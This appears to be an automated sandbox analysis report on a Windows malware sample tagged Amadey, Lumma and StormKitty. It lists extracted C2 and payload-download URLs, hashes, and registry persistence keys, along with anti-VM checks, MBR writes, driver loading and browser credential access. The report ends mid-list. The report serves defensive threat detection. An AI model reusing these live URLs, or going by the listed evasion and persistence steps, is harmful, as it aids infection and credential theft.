Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
07/04/2025, 14:50
Static task
static1
Behavioral task
behavioral1
Sample
2025-04-07_669f3bec52a1cde1a51fee8bfab3b8b5_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-04-07_669f3bec52a1cde1a51fee8bfab3b8b5_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
669f3bec52a1cde1a51fee8bfab3b8b5
-
SHA1
5e6820a2241a8a468997d8edacd5d57910a7f9a1
-
SHA256
2d4aeb40b6324499964f7d86f718f8e4f35c874cf76eda3e2e920bd0975e6b95
-
SHA512
894f7cf30afd8d9511ff319b0c49e55ead55e8fbe0a4f75ef2d9dbd7081653fe5aa70ebdc880e9d68084321da82ccb0579f402fed905377d9e97bab378ca9992
-
SSDEEP
24576:0qDEvCTbMWu7rQYlBQcBiT6rprG8a0Eu:0TvC/MTQYxsWR7a0E
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://jrxsafer.top/shpaoz
https://plantainklj.run/opafg
https://puerrogfh.live/iqwez
https://quavabvc.top/iuzhd
https://nadvennture.top/GKsiio
https://targett.top/dsANGt
https://rambutanvcx.run/adioz
https://uywmedici.top/noagis
https://reboundui.live/aomgd
https://krxspint.digital/kendwz
https://rhxhube.run/pogrs
https://grxeasyw.digital/xxepw
https://advennture.top/GKsiio
https://xrfxcaseq.live/gspaz
https://ywmedici.top/noagis
https://rodformi.run/aUosoz
https://metalsyo.digital/opsa
https://ironloxp.live/aksdd
https://navstarx.shop/FoaJSi
https://wstarcloc.bet/GOksAo
https://atargett.top/dsANGt
https://spacedbv.world/EKdlsk
https://galxnetb.today/GsuIAo
Signatures
-
Amadey family
-
Asyncrat family
-
Lumma family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral1/memory/1916-307-0x0000000000400000-0x000000000073C000-memory.dmp family_stormkitty -
Stormkitty family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 23bd50fca2.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempQSOPYYHQPWAOVVBAEJIONKX0KQKMIZSN.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5267654500.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 21 4188 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3872 powershell.exe 4188 powershell.exe -
Downloads MZ/PE file 15 IoCs
flow pid Process 356 1876 MSBuild.exe 21 4188 powershell.exe 107 1876 MSBuild.exe 132 1876 MSBuild.exe 221 1876 MSBuild.exe 233 1876 MSBuild.exe 387 1876 MSBuild.exe 36 6104 rapes.exe 36 6104 rapes.exe 36 6104 rapes.exe 225 936 svchost.exe 86 1876 MSBuild.exe 284 1876 MSBuild.exe 303 1876 MSBuild.exe 314 1876 MSBuild.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File created C:\Windows\System32\Drivers\b30be13d.sys f6b10b66.exe File created C:\Windows\System32\Drivers\klupd_b30be13da_arkmon.sys f6b10b66.exe File created C:\Windows\System32\Drivers\klupd_b30be13da_klbg.sys f6b10b66.exe -
Sets service image path in registry 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b30be13da_arkmon_7C924DD4\ImagePath = "\\??\\C:\\KVRT2020_Data\\Temp\\7C924DD4D20055C80007791130E2D03F\\klupd_b30be13da_arkmon.sys" f6b10b66.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\b30be13d\ImagePath = "System32\\Drivers\\b30be13d.sys" f6b10b66.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b30be13da_arkmon\ImagePath = "System32\\Drivers\\klupd_b30be13da_arkmon.sys" f6b10b66.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b30be13da_klbg\ImagePath = "System32\\Drivers\\klupd_b30be13da_klbg.sys" f6b10b66.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b30be13da_klark\ImagePath = "System32\\Drivers\\klupd_b30be13da_klark.sys" f6b10b66.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b30be13da_mark\ImagePath = "System32\\Drivers\\klupd_b30be13da_mark.sys" f6b10b66.exe -
Uses browser remote debugging 2 TTPs 8 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 412 chrome.exe 1120 chrome.exe 552 msedge.exe 2820 msedge.exe 1396 msedge.exe 4728 chrome.exe 1796 chrome.exe 5984 chrome.exe -
Checks BIOS information in registry 2 TTPs 12 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5267654500.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 23bd50fca2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempQSOPYYHQPWAOVVBAEJIONKX0KQKMIZSN.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempQSOPYYHQPWAOVVBAEJIONKX0KQKMIZSN.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5267654500.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 23bd50fca2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation TempQSOPYYHQPWAOVVBAEJIONKX0KQKMIZSN.EXE Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation mshta.exe -
Deletes itself 1 IoCs
pid Process 624 w32tm.exe -
Executes dropped EXE 24 IoCs
pid Process 5304 TempQSOPYYHQPWAOVVBAEJIONKX0KQKMIZSN.EXE 6104 rapes.exe 3920 31W3sid.exe 6072 DgQBvwg.exe 744 exp.exe 4536 larBxd7.exe 2032 rapes.exe 3496 9sWdA2p.exe 5004 Rm3cVPI.exe 5384 v1BRaoR.exe 2988 ibC8xs1.exe 1872 exp.exe 5660 UZPt0hR.exe 4900 5267654500.exe 632 tzutil.exe 624 w32tm.exe 13896 AfkeY2q.exe 14204 rapes.exe 6744 qhjMWht.exe 6796 69504511.exe 7628 f6b10b66.exe 9520 Nehh6wZ.exe 7868 NlmvJyQ.exe 8204 23bd50fca2.exe -
Identifies Wine through registry keys 2 TTPs 6 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine TempQSOPYYHQPWAOVVBAEJIONKX0KQKMIZSN.EXE Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine 5267654500.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine 23bd50fca2.exe -
Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\b30be13d.sys\ = "Driver" f6b10b66.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\b30be13d.sys f6b10b66.exe -
Loads dropped DLL 25 IoCs
pid Process 7628 f6b10b66.exe 7628 f6b10b66.exe 7628 f6b10b66.exe 7628 f6b10b66.exe 7628 f6b10b66.exe 7628 f6b10b66.exe 7628 f6b10b66.exe 7628 f6b10b66.exe 7628 f6b10b66.exe 7628 f6b10b66.exe 7628 f6b10b66.exe 7628 f6b10b66.exe 7628 f6b10b66.exe 7628 f6b10b66.exe 7628 f6b10b66.exe 7628 f6b10b66.exe 7628 f6b10b66.exe 7628 f6b10b66.exe 7628 f6b10b66.exe 7628 f6b10b66.exe 7628 f6b10b66.exe 7628 f6b10b66.exe 7628 f6b10b66.exe 7628 f6b10b66.exe 7628 f6b10b66.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts MSBuild.exe -
Accesses Microsoft Outlook profiles 1 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 MSBuild.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook MSBuild.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 MSBuild.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 MSBuild.exe -
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Shell = "explorer.exe C:\\Users\\Admin\\AppData\\Roaming\\blv20gPs\\exp.exe" DgQBvwg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Shell = "explorer.exe C:\\Users\\Admin\\AppData\\Roaming\\blv20gPs\\exp.exe" ibC8xs1.exe Set value (str) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\095972cb-887b-487e-b033-90f132e0aa07 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{2c57f717-aa6d-4c7a-b6de-1cd708da1e0d}\\095972cb-887b-487e-b033-90f132e0aa07.cmd\"" f6b10b66.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: f6b10b66.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 286 raw.githubusercontent.com 139 raw.githubusercontent.com -
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 5267654500.exe File opened for modification \??\PhysicalDrive0 f6b10b66.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
pid Process 5304 TempQSOPYYHQPWAOVVBAEJIONKX0KQKMIZSN.EXE 6104 rapes.exe 2032 rapes.exe 4900 5267654500.exe 14204 rapes.exe 8204 23bd50fca2.exe -
Suspicious use of SetThreadContext 21 IoCs
description pid Process procid_target PID 3920 set thread context of 5268 3920 31W3sid.exe 107 PID 6072 set thread context of 1876 6072 DgQBvwg.exe 121 PID 744 set thread context of 3644 744 exp.exe 132 PID 1876 set thread context of 3192 1876 MSBuild.exe 136 PID 1876 set thread context of 2016 1876 MSBuild.exe 138 PID 5384 set thread context of 1916 5384 v1BRaoR.exe 141 PID 1876 set thread context of 5648 1876 MSBuild.exe 152 PID 1876 set thread context of 1148 1876 MSBuild.exe 166 PID 1876 set thread context of 6012 1876 MSBuild.exe 167 PID 2988 set thread context of 1948 2988 ibC8xs1.exe 174 PID 1876 set thread context of 2488 1876 MSBuild.exe 180 PID 1872 set thread context of 1064 1872 exp.exe 184 PID 1876 set thread context of 3816 1876 MSBuild.exe 194 PID 1876 set thread context of 14056 1876 MSBuild.exe 199 PID 1876 set thread context of 6476 1876 MSBuild.exe 202 PID 1876 set thread context of 6640 1876 MSBuild.exe 203 PID 9520 set thread context of 9604 9520 Nehh6wZ.exe 210 PID 1876 set thread context of 9732 1876 MSBuild.exe 211 PID 7868 set thread context of 7820 7868 NlmvJyQ.exe 213 PID 1876 set thread context of 7456 1876 MSBuild.exe 215 PID 1876 set thread context of 868 1876 MSBuild.exe 219 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN f6b10b66.exe File opened (read-only) \??\VBoxMiniRdrDN 69504511.exe -
Drops file in Program Files directory 1 IoCs
description ioc Process File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe MSBuild.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job TempQSOPYYHQPWAOVVBAEJIONKX0KQKMIZSN.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 2 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh f6b10b66.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh f6b10b66.exe -
Program crash 1 IoCs
pid pid_target Process procid_target 5584 1916 WerFault.exe 141 -
System Location Discovery: System Language Discovery 1 TTPs 24 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rm3cVPI.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UZPt0hR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5267654500.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qhjMWht.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language larBxd7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9sWdA2p.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 69504511.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f6b10b66.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 23bd50fca2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempQSOPYYHQPWAOVVBAEJIONKX0KQKMIZSN.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AfkeY2q.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-04-07_669f3bec52a1cde1a51fee8bfab3b8b5_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI MSBuild.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI MSBuild.exe -
Checks processor information in registry 2 TTPs 21 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString MSBuild.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet MSBuild.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor MSBuild.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data MSBuild.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier MSBuild.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe -
Modifies registry class 12 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings rundll32.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2560 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1876 MSBuild.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4188 powershell.exe 4188 powershell.exe 5304 TempQSOPYYHQPWAOVVBAEJIONKX0KQKMIZSN.EXE 5304 TempQSOPYYHQPWAOVVBAEJIONKX0KQKMIZSN.EXE 6104 rapes.exe 6104 rapes.exe 6072 DgQBvwg.exe 6072 DgQBvwg.exe 744 exp.exe 744 exp.exe 2032 rapes.exe 2032 rapes.exe 4536 larBxd7.exe 4536 larBxd7.exe 1876 MSBuild.exe 1876 MSBuild.exe 4536 larBxd7.exe 4536 larBxd7.exe 4536 larBxd7.exe 4536 larBxd7.exe 1876 MSBuild.exe 1876 MSBuild.exe 1876 MSBuild.exe 1876 MSBuild.exe 1876 MSBuild.exe 1876 MSBuild.exe 1876 MSBuild.exe 1876 MSBuild.exe 1876 MSBuild.exe 1876 MSBuild.exe 1876 MSBuild.exe 1876 MSBuild.exe 1876 MSBuild.exe 1876 MSBuild.exe 1876 MSBuild.exe 1876 MSBuild.exe 1876 MSBuild.exe 1876 MSBuild.exe 1876 MSBuild.exe 1876 MSBuild.exe 1876 MSBuild.exe 1876 MSBuild.exe 1876 MSBuild.exe 1876 MSBuild.exe 1876 MSBuild.exe 1876 MSBuild.exe 3496 9sWdA2p.exe 3496 9sWdA2p.exe 1876 MSBuild.exe 1876 MSBuild.exe 1876 MSBuild.exe 1876 MSBuild.exe 1876 MSBuild.exe 1876 MSBuild.exe 1876 MSBuild.exe 1876 MSBuild.exe 1876 MSBuild.exe 1876 MSBuild.exe 1876 MSBuild.exe 1876 MSBuild.exe 3496 9sWdA2p.exe 3496 9sWdA2p.exe 3496 9sWdA2p.exe 3496 9sWdA2p.exe -
Suspicious behavior: LoadsDriver 4 IoCs
pid Process 7628 f6b10b66.exe 7628 f6b10b66.exe 7628 f6b10b66.exe 7628 f6b10b66.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 5660 UZPt0hR.exe 5660 UZPt0hR.exe 5660 UZPt0hR.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 4728 chrome.exe 4728 chrome.exe 4728 chrome.exe 4728 chrome.exe 552 msedge.exe 552 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4188 powershell.exe Token: SeDebugPrivilege 6072 DgQBvwg.exe Token: SeDebugPrivilege 744 exp.exe Token: SeDebugPrivilege 1876 MSBuild.exe Token: SeDebugPrivilege 1876 MSBuild.exe Token: SeDebugPrivilege 1876 MSBuild.exe Token: SeDebugPrivilege 1876 MSBuild.exe Token: SeDebugPrivilege 1876 MSBuild.exe Token: SeDebugPrivilege 1876 MSBuild.exe Token: SeDebugPrivilege 1876 MSBuild.exe Token: SeDebugPrivilege 1876 MSBuild.exe Token: SeDebugPrivilege 1876 MSBuild.exe Token: SeDebugPrivilege 1876 MSBuild.exe Token: SeDebugPrivilege 1876 MSBuild.exe Token: SeDebugPrivilege 1876 MSBuild.exe Token: SeDebugPrivilege 1876 MSBuild.exe Token: SeDebugPrivilege 1876 MSBuild.exe Token: SeDebugPrivilege 1876 MSBuild.exe Token: SeDebugPrivilege 1876 MSBuild.exe Token: SeDebugPrivilege 1876 MSBuild.exe Token: SeDebugPrivilege 1876 MSBuild.exe Token: SeDebugPrivilege 1876 MSBuild.exe Token: SeDebugPrivilege 1876 MSBuild.exe Token: SeDebugPrivilege 1876 MSBuild.exe Token: SeDebugPrivilege 1876 MSBuild.exe Token: SeDebugPrivilege 1916 MSBuild.exe Token: SeShutdownPrivilege 4728 chrome.exe Token: SeCreatePagefilePrivilege 4728 chrome.exe Token: SeIncreaseQuotaPrivilege 1916 MSBuild.exe Token: SeSecurityPrivilege 1916 MSBuild.exe Token: SeTakeOwnershipPrivilege 1916 MSBuild.exe Token: SeLoadDriverPrivilege 1916 MSBuild.exe Token: SeSystemProfilePrivilege 1916 MSBuild.exe Token: SeSystemtimePrivilege 1916 MSBuild.exe Token: SeProfSingleProcessPrivilege 1916 MSBuild.exe Token: SeIncBasePriorityPrivilege 1916 MSBuild.exe Token: SeCreatePagefilePrivilege 1916 MSBuild.exe Token: SeBackupPrivilege 1916 MSBuild.exe Token: SeRestorePrivilege 1916 MSBuild.exe Token: SeShutdownPrivilege 1916 MSBuild.exe Token: SeDebugPrivilege 1916 MSBuild.exe Token: SeSystemEnvironmentPrivilege 1916 MSBuild.exe Token: SeRemoteShutdownPrivilege 1916 MSBuild.exe Token: SeUndockPrivilege 1916 MSBuild.exe Token: SeManageVolumePrivilege 1916 MSBuild.exe Token: 33 1916 MSBuild.exe Token: 34 1916 MSBuild.exe Token: 35 1916 MSBuild.exe Token: 36 1916 MSBuild.exe Token: SeIncreaseQuotaPrivilege 1916 MSBuild.exe Token: SeSecurityPrivilege 1916 MSBuild.exe Token: SeTakeOwnershipPrivilege 1916 MSBuild.exe Token: SeLoadDriverPrivilege 1916 MSBuild.exe Token: SeSystemProfilePrivilege 1916 MSBuild.exe Token: SeSystemtimePrivilege 1916 MSBuild.exe Token: SeProfSingleProcessPrivilege 1916 MSBuild.exe Token: SeIncBasePriorityPrivilege 1916 MSBuild.exe Token: SeCreatePagefilePrivilege 1916 MSBuild.exe Token: SeBackupPrivilege 1916 MSBuild.exe Token: SeRestorePrivilege 1916 